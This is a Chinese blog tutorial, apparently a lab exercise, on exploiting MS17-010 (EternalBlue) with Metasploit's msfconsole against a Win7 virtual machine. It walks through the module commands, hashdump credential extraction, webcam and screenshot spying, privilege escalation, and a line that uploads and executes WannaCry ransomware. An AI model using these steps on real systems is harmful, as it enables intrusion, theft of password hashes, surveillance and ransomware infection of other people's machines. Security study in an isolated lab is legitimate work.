msfconsole的使用,MSF17-010(虚拟机)的实验

已于 2023-03-16 21:05:33 修改
阅读量927 收藏 4
点赞数 1
分类专栏: 安全 文章标签: 安全
于 2023-03-16 16:53:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52371314/article/details/129589695
版权

一.介绍永恒之蓝:

 二.环境

宿主机kali: 

                   IP地址

靶机win7:

                  IP地址

 然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通.

三.msfconsole的使用

1.输入命令msfconslole使用msf框架

 2.search  MSF17-010   搜索相关脚本

 auxiliary插件是用来辅助验证程序扫描的

exploit插件是用来攻击的,攻击脚本

3.通过代码来调用这些脚本,use+代码

(1)如use+启动扫描模块

 

 (2)输入命令 show options产看模块配置需要的参数

 (3)配置机器目标IP  set rhosts+ 靶机IP

 (4)run 启动  

 (5)扫描结束以后切换攻击模块

 (6)产看配置项show options

 (7)配置目标机器IP

 (8)run

 session 建立一个会话

 (9)攻击成功

输入shell

 可以查看靶机一些信息

 乱码是因为中文的原因,不要紧

(10)输入exit可以退出

输入hashdump可以查看靶机的用户以及hash密码,当然hash密码需要用MD5来进行解密

注意,如果密码简单,md5可以解密成功,否则它也无法解密,毕竟它采取的也是爆破.

还有一些用法可用help来进行查看

 getuid,sysinfo /*查看系统信息*/

webcam_list /*看看被控制的电脑有没有摄像头,如果有用`webcam_stream`命令可以打开摄像头监控*/

route /*查看路由表 */

screenshot /*桌面截图,很卡* /

shell /*打开命令行,然后可以ipconfig/whoami/net user*/

ps /*看看开了哪些杀毒软件,内网一致*/ kill hashdump getsystem 提权 upload wcry/wcry.ext c:\ upload wcry/FILE_ID.DIZ c:\ execute -f c:\wcry.exe 上传和执行勒索病毒,

一米耕耘
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
msfconsole
汪敏的博客
07-12 1237
msfconsole
使用MSF Console实现MS17-010漏洞利用
Fng的博客
03-30 1410
使用Kali的Metasploit Console(MSF Console)工具实现Windows 7 Professional下MS17-010(永恒之蓝)漏洞利用。
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 1796
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用
msfconsole的简单使用
m0_53603468的博客
12-30 8525
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsolemsfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
metasploit中msfconsole使用教程,永恒之蓝漏洞复现
qq_47289634的博客
03-13 2139
msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本,永恒之蓝是在 Windows 发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞复现之(MS17-010
weixin_56513549的博客
11-02 2791
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
最新发布
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
ms17_010_psexec.rb
04-11
msfconsole中17010,永恒之蓝模块。获取权限必备
msfconsole实战使用(结合靶场演示),2024网络安全进阶新篇章
HUAXIAL的博客
04-08 1104
Metasploit框架: Metasploit是一个用于开发、测试和执行渗透测试的框架,旨在帮助安全专业人员评估和增强系统的安全性。多功能平台: MSFconsole是Metasploit的命令行界面,支持多种操作系统,包括Linux、Windows和macOS。模块化结构: Metasploit的设计是模块化的,它包含了大量的模块,涵盖了各种渗透测试任务,如漏洞利用、扫描、信息收集等。
关于Metasploit-学习笔记-基础命令以及参数
weixin_34190136的博客
09-13 1164
Metasploit官网 原文链接:http://www.freebuf.com/tools/67685.html1、官网内容很多,但是都是一些英文。2、有Windows平台的安装,也有Linux平台的。总之就是基于pc的安装。3、在命令行窗口输入msfconsole可以直接进入Metasploit这个工具的工作环境。4、Msfconsole的系统文件和用户文件位于/usr...
MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 900
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4556
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
ms17-010 永恒之蓝
qq_62803993的博客
01-12 3285
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
kali中安装使用msfconsole
wyzhxhn的博客
10-25 7759
msfconsole安装
Kali Linux 学习日记4 -Metasploit(MSF)和 Nessus
qq_46081990的博客
03-06 1224
为了利用一个vulnerability(系统存在的漏洞),通常需要一个exploit(利用漏洞的代码)。exploit可以利用vulnerability,提供目标主机的权限。exploit通常会向目标发送payload(攻击成功后向目标传递的恶意代码),以此来获取目标主机的权限。payload通常由exploit来传递到目标系统上。Metasploit是一个漏洞框架。全称为The Metasploit Framework,简称MSF。它允许使用者开发自己的漏洞脚本(ruby语言),然后进行测试。
网安实训(九)| 利用Metasploit工具和Ms17-010漏洞进行控制权限获取
朔方鸟的博客
02-19 3512
MS17-010是微软的一个系统漏洞,通过该漏洞,攻击者可获取到靶机的最高shell权限,从而进行一系列的操作。 本实验将利用Metasploit进行MS17-010漏洞的复现和攻击。
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值